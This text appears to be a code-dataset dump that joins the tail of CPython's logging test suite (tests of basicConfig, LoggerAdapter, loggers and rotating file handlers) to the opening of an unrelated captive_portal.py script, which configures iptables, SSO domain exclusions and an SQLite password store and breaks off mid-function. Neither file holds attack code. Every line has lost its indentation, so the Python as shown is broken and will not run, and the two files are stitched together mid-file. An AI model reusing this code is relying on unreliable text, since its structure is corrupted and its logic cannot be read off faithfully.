self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
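# Illustrative sketch (not part of the test suite): LoggerAdapter is usually
# given an 'extra' dict whose keys become attributes on every record, which a
# format string can then reference.  The 'job_id' field, logger name and
# format string are invented for the example.
def _example_adapter_with_extra():
    import io
    import logging
    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter('%(job_id)s %(levelname)s %(message)s'))
    logger = logging.getLogger("example.adapter")
    logger.addHandler(handler)
    try:
        adapter = logging.LoggerAdapter(logger, {'job_id': 'J-1'})
        adapter.warning("adapter injected the job id")
    finally:
        logger.removeHandler(handler)
        handler.close()
    return stream.getvalue()    # "J-1 WARNING adapter injected the job id\n"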
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
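# Editor's note: a minimal, self-contained sketch (not part of the test suite and never
# invoked here) of the namer/rotator hooks exercised by test_rotator above, configuring
# a handler that zlib-compresses rotated files. The path argument is hypothetical.
def _example_compressed_rotating_handler(path):
    import logging.handlers
    import os
    import zlib

    def namer(name):
        return name + ".gz"

    def rotator(source, dest):
        # Compress the closed log file and remove the original.
        with open(source, "rb") as sf:
            data = sf.read()
        with open(dest, "wb") as df:
            df.write(zlib.compress(data, 9))
        os.remove(source)

    handler = logging.handlers.RotatingFileHandler(path, maxBytes=1024, backupCount=3)
    handler.namer = namer
    handler.rotator = rotator
    return handler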
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
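# Editor's note: the loop above attaches one generated test per "when" value via
# setattr; the same pattern in isolation (hypothetical names, with default arguments
# used to bind the loop variables at definition time):
#
#     for value in (1, 2, 3):
#         def _test(self, value=value):
#             self.assertGreater(value, 0)
#         setattr(SomeTestCase, "test_value_%d" % value, _test)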
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
captive_portal.py
|
#!/usr/bin/python3
import http.server
import http.client
import subprocess
import cgi
import os
import sys
import datetime
import binascii
import re
import threading
import ssl
import urllib
import json
import html
import socket
import time
import sqlite3
import hashlib
''' Configuration
-----------------------------------'''
# Server Information
LOCAL_SERVER_IP = "192.168.20.1"
HTTP_SERVER_PORT = 80
HTTPS_SERVER_PORT = 443
REMOTE_SERVER_DOMAIN = "captive.ddns.net"
try:
REMOTE_SERVER_IP = socket.gethostbyname(REMOTE_SERVER_DOMAIN)
except socket.gaierror:
REMOTE_SERVER_IP = LOCAL_SERVER_IP
# Interfaces
INTERFACE_INPUT = "wlan0"
INTERFACE_OUTPUT = "eth0"
# Files
PAGES_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pages')
# iptables
IPTABLES_RESET = True
IPTABLES_FORWARD = True
IPTABLES_INIT = True
# HTTPS
SSL_CERT_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'cert.pem')
SSL_KEY_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'key.pem')
# Custom certificate
# openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
# SSO (Configuration has to be inside the sso_config.py file)
SSO_FACEBOOK = True
SSO_FACEBOOK_APP_ID = None
SSO_FACEBOOK_APP_SECRET = None
SSO_GOOGLE = True
SSO_GOOGLE_CLIENT_ID = None
SSO_GOOGLE_CLIENT_SECRET = None
from sso_config import *
# Local DNS Server
USE_CUSTOM_DNS_SERVER = True
LOCAL_DNS_SERVER_IP = LOCAL_SERVER_IP
DNS_SERVER_PORT = 53
# Exclude Facebook addresses
SSO_FACEBOOK_EXCLUDE_DOMAINS = [
"facebook.com",
"www.facebook.com",
"static.xx.fbcdn.net"
]
SSO_GOOGLE_EXCLUDE_DOMAINS = [
#"accounts.google.com",
#"accounts.google.gr",
"lh3.googleusercontent.com",
"fonts.gstatic.com",
"ssl.gstatic.com",
"accounts.youtube.com",
"play.google.com"
]
SSO_GOOGLE_EXCLUDE_DOMAINS_COUNTRIES = ['.com', '.ac', '.ad', '.ae', '.com.af', '.com.ag', '.com.ai', '.al', '.am', '.co.ao', '.com.ar', '.as', '.at', '.com.au', '.az', '.ba', '.com.bd', '.be', '.bf', '.bg', '.com.bh', '.bi', '.bj', '.com.bn', '.com.bo', '.com.br', '.bs', '.bt', '.co.bw', '.by', '.com.bz', '.ca', '.com.kh', '.cc', '.cd', '.cf', '.cat', '.cg', '.ch', '.ci', '.co.ck', '.cl', '.cm', '.cn', '.com.co', '.co.cr', '.com.cu', '.cv', '.com.cy', '.cz', '.de', '.dj', '.dk', '.dm', '.com.do', '.dz', '.com.ec', '.ee', '.com.eg', '.es', '.com.et', '.fi', '.com.fj', '.fm', '.fr', '.ga', '.ge', '.gf', '.gg', '.com.gh', '.com.gi', '.gl', '.gm', '.gp', '.gr', '.com.gt', '.gy', '.com.hk', '.hn', '.hr', '.ht', '.hu', '.co.id', '.iq', '.ie', '.co.il', '.im', '.co.in', '.io', '.is', '.it', '.je', '.com.jm', '.jo', '.co.jp', '.co.ke', '.ki', '.kg', '.co.kr', '.com.kw', '.kz', '.la', '.com.lb', '.com.lc', '.li', '.lk', '.co.ls', '.lt', '.lu', '.lv', '.com.ly', '.co.ma', '.md', '.me', '.mg', '.mk', '.ml', '.com.mm', '.mn', '.ms', '.com.mt', '.mu', '.mv', '.mw', '.com.mx', '.com.my', '.co.mz', '.com.na', '.ne', '.com.nf', '.com.ng', '.com.ni', '.nl', '.no', '.com.np', '.nr', '.nu', '.co.nz', '.com.om', '.com.pk', '.com.pa', '.com.pe', '.com.ph', '.pl', '.com.pg', '.pn', '.com.pr', '.ps', '.pt', '.com.py', '.com.qa', '.ro', '.rs', '.ru', '.rw', '.com.sa', '.com.sb', '.sc', '.se', '.com.sg', '.sh', '.si', '.sk', '.com.sl', '.sn', '.sm', '.so', '.st', '.sr', '.com.sv', '.td', '.tg', '.co.th', '.com.tj', '.tk', '.tl', '.tm', '.to', '.tn', '.com.tr', '.tt', '.com.tw', '.co.tz', '.com.ua', '.co.ug', '.co.uk', '.com', '.com.uy', '.co.uz', '.com.vc', '.co.ve', '.vg', '.co.vi', '.com.vn', '.vu', '.ws', '.co.za', '.co.zm', '.co.zw']
SSO_GOOGLE_EXCLUDE_IPS = []
SSO_FACEBOOK_EXCLUDE_IPS = []
# Credentials Sign in
CREDENTIALS_SIGNIN = True
SQLITE3_DATABASE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'users.db')
# Create remote link
REMOTE_SERVER_LINK = "https://" + REMOTE_SERVER_DOMAIN + ":" + str(HTTPS_SERVER_PORT) + "/"
if str(HTTPS_SERVER_PORT) == "443":
REMOTE_SERVER_LINK = "https://" + REMOTE_SERVER_DOMAIN + "/"
# Authorizations Daemon
AUTHDAEMON_INTERVAL_CHECK = 10
AUTHDAEMON_MAC_CHANGE_CHECK = True
# Access Times
ACCESS_TIME_INTERNET = 2*60*60
ACCESS_TIME_FACEBOOK_LOGIN = 2*60
ACCESS_TIME_GOOGLE_LOGIN = 2*60
LOG_DEBUG = 0
LOG_VERBOSE = 2
LOG_NORMAL = 4
#LOG_LEVEL = LOG_NORMAL
LOG_LEVEL = LOG_NORMAL
''' Database
-----------------------------------'''
database = None
class Database:
def __init__(self):
# Init path
self.path = SQLITE3_DATABASE_PATH
# Try to connect to db
try:
self.conn = sqlite3.connect(self.path, check_same_thread=False)
except sqlite3.Error as e:
self.conn = None
self.log("Error: " + str(e))
return
# Create dummy password
self.dummy_pass = self.hash_password('dummy')
# Init users table
self.conn.execute('CREATE TABLE IF NOT EXISTS users (username TEXT PRIMARY KEY, password_hash TEXT)')
# Init tokens table
#self.conn.execute('CREATE TABLE IF NOT EXISTS tokens (hash TEXT PRIMARY KEY, seconds int)')
def createUser(self, username, password):
try:
self.conn.execute('INSERT INTO users (username, password_hash) VALUES (?, ?)', (username, self.hash_password(password)))
self.conn.commit()
return True
except sqlite3.Error as e:
self.log("Failed: " + str(e))
return False
def authenticateUser(self, username, password):
c = self.conn.cursor()
c.execute("SELECT password_hash FROM users WHERE username = ?", (username,))
data = c.fetchone()
if not data or len(data) < 1:
# Dummy calculations to avoid time attack
self.verify_password(self.dummy_pass, 'invalid-dummy')
return False
else:
return self.verify_password(data[0], password)
# Hash a password for storing.
def hash_password(self, password, alg='sha512'):
salt = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
pwdhash = hashlib.pbkdf2_hmac(alg, password.encode('utf-8'), salt, 100000)
pwdhash = binascii.hexlify(pwdhash)
return (salt + pwdhash).decode('ascii')
# Verify a stored password against one provided by user
def verify_password(self, stored_password, provided_password, alg='sha512'):
salt = stored_password[:64]
stored_password = stored_password[64:]
pwdhash = hashlib.pbkdf2_hmac(alg, provided_password.encode('utf-8'), salt.encode('ascii'), 100000)
pwdhash = binascii.hexlify(pwdhash).decode('ascii')
return pwdhash == stored_password
def log(self, message, level = LOG_LEVEL):
msgLog("Database", message, level)
''' Authorizations Monitor Daemon
-----------------------------------'''
authDaemon = None
class AuthorizationsDaemon:
def __init__(self):
self.authorizations = {}
self.clients = {}
self.sessions = []
self.ip_sessions = {}
def runChecks(self):
self.checkExpiredSessions()
self.checkMacBindings()
def checkExpiredSessions(self):
now = datetime.datetime.now()
expired = []
for session in self.sessions:
if session["expiration"] < now:
expired.append(session)
# Revoke authorization on expired session
self.deauthorizeSessions(expired)
def checkMacBindings(self):
now = datetime.datetime.now()
clients = getArpList()
for client in clients:
ip = client["ip"]
